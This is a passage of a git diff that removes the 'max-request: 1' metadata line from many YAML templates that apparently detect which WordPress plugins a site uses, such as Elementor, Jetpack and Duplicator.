-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
